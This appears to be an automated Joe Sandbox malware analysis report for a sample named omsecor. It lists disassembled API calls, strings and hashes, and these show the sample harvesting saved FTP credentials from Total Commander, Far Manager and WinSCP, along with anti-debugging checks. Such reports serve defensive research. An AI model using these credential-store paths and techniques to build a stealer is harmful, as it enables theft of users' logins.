                                                                                                                                                                                                  • API ID: Internet$AttemptConnectOpen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2984283330-0
                                                                                                                                                                                                  • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                  • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                  • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                  • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfileString$AllocHeap
                                                                                                                                                                                                  • String ID: SOFTWARE\Ghisler\Total Commander$connections$default$ftp://%s:%s@%s$host$password$username
                                                                                                                                                                                                  • API String ID: 2479592106-2015850556
                                                                                                                                                                                                  • Opcode ID: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                  • Instruction ID: 106d3b010c48b16868dcb071ba678aa04ac33b338b72d514ced31169f03d36dc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c368ffed181334e4a999fe46bdaddc7fa5d9e929cd71afacdc90b45fbd8a1971
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A2513D71900109BAEB11EFA5DD41EAEBBBDEF44308F204077E904F6292D775AF068B58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00406A68: RegOpenKeyExW.ADVAPI32(80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current,00000000,00000001,?,00420840,?,00000000), ref: 00406A8C
                                                                                                                                                                                                    • Part of subcall function 00406ADF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004032E5
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 004032ED
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(75C50B80,0000000A,00000008,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403309
                                                                                                                                                                                                  • VirtualProtect.KERNEL32(75C50B88,0000000A,?,?,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403333
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(004032AF,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 0040333A
                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(atl,?,?,0040B182,?,0040B320,00000000,?,0040B3E0), ref: 00403345
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxWinInit), ref: 0040335D
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxAttachControl), ref: 0040336A
                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AtlAxGetControl), ref: 00403377
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AddressProc$MetricsOpenProtectSystemVirtual$ExceptionFilterLibraryLoadUnhandled
                                                                                                                                                                                                  • String ID: AtlAxAttachControl$AtlAxGetControl$AtlAxWinInit$atl
                                                                                                                                                                                                  • API String ID: 3066332896-2664446222
                                                                                                                                                                                                  • Opcode ID: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                  • Instruction ID: 61d9a237d914756188f526d52bf2e891562662c8e4878cb3977fb5d3c9d5a9bd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe1f50a485c472adffca313bd216073f3c2af1e46121dbe202f23b587a8dcd22
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6212771900390EED3019FBAAD84A5A7FE8EB5B31171545BBE556F32A0C7B80902CB79
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                                                                                                                                                                                                  • PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00408342
                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00408377
                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 004083B9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                                                                                                                                                                                                  • String ID: .$.$.8@$.8@$@@
                                                                                                                                                                                                  • API String ID: 2348139788-3828113974
                                                                                                                                                                                                  • Opcode ID: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                  • Instruction ID: 14d48cc84805742e6106b0fbd309534a1a80b5d2ede52edf6fcc6a53e93a4421
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6239f567dea19bf0f1c0472067baa2396414c83c3cbbf53e1e63fbac9dc8ae5f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35414F3140021DABCF219F50DE49BDE7B79AF84708F0401BAFD84B11A1EB7A9DA5CB59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00020002), ref: 00403566
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 0040358A
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004035B5
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403639
                                                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,00000015,?), ref: 00403653
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 00403681
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfile$String$AllocHeap$CombinePath
                                                                                                                                                                                                  • String ID: ftp://%s:%s@%s:%u$pass$port$user
                                                                                                                                                                                                  • API String ID: 3432043379-2696999094
                                                                                                                                                                                                  • Opcode ID: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                  • Instruction ID: ca29095f8650abd3188745a74e72d347e34b1f07fc40ddfd65b33f15b90f053b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44b7e08f2b4d95bd69ae67f2fadcfc6b29273b9b05256415c6f2e19ab8e382dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3515FB2104606AFE710EF61DC81EABBBEDEB88304F10493BF554A32D1D735DA058B56
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0040D0C4
                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D0D9
                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(0040E248), ref: 0040D0E4
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0040D100
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 0040D107
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2579439406-0
                                                                                                                                                                                                  • Opcode ID: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                  • Instruction ID: 078c109d1665b9b830d76e00ceeb27c9797f204ae48b5850d213398ac2e03a3c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b5eef82b17558b1403b6a949654a497de19b842f61d59b3835a6f2e4e548581
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F21CEB8801244DFD700DF59F945A857BF4BB08385F0086BAE708E76B0E7B458808F0D
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004058FB: _memset.LIBCMT ref: 0040591C
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000), ref: 00402EC3
                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00001000,00420840), ref: 00402EDC
                                                                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 00402F4E
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403237
                                                                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 00403258
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$CurrentDirectoryFileModuleName_memset
                                                                                                                                                                                                  • String ID: .html$4@$8@$8@$From: $Via: $^client=$^key=$file$none
                                                                                                                                                                                                  • API String ID: 2247176544-2288798624
                                                                                                                                                                                                  • Opcode ID: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                                                                                                                                                                                                  • Instruction ID: 295a2e83bb6b363340795eecc9968ea2d400926a6410b4e4a91bd94f8c6abde8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79cd1330f744164cc704132905a94fc592a0dfc2489d9d56cff5d063718bdc77
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01B17E72A001199BCB24EF61CD91AEB77A9EF44304F4040BFF519E7291EA389A858F59
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                                                                                                                                                                                                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                                                                                                                                                                                                  • String ID: \netprotdrvss.exe$begun.ru
                                                                                                                                                                                                  • API String ID: 2887986221-2660752650
                                                                                                                                                                                                  • Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                                                                                                                                                                                                  • Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84
                                                                                                                                                                                                    • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                    • Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                    • Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                    • Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
                                                                                                                                                                                                  • String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
                                                                                                                                                                                                  • API String ID: 2046068145-3914982127
                                                                                                                                                                                                  • Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                  • Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 004027F5
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                                                                                                                                                                                                    • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Internet$InitializeOpenOption
                                                                                                                                                                                                  • String ID: From: true
                                                                                                                                                                                                  • API String ID: 1176259655-9585188
                                                                                                                                                                                                  • Opcode ID: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                  • Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040442A
                                                                                                                                                                                                    • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapOpen$AllocCloseEnumFree
                                                                                                                                                                                                  • String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
                                                                                                                                                                                                  • API String ID: 416369273-4007225339
                                                                                                                                                                                                  • Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                  • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040476D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: AllocCloseEnumHeapOpen
                                                                                                                                                                                                  • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                                                                                                                                                                                                  • API String ID: 3497950970-285550827
                                                                                                                                                                                                  • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                  • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409359
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00409362
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                                                                                                                                                                                                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                                                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: String$Free$Alloc$CharLower
                                                                                                                                                                                                  • String ID: http:$javascript$+@
                                                                                                                                                                                                  • API String ID: 1987340527-3375436608
                                                                                                                                                                                                  • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                  • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
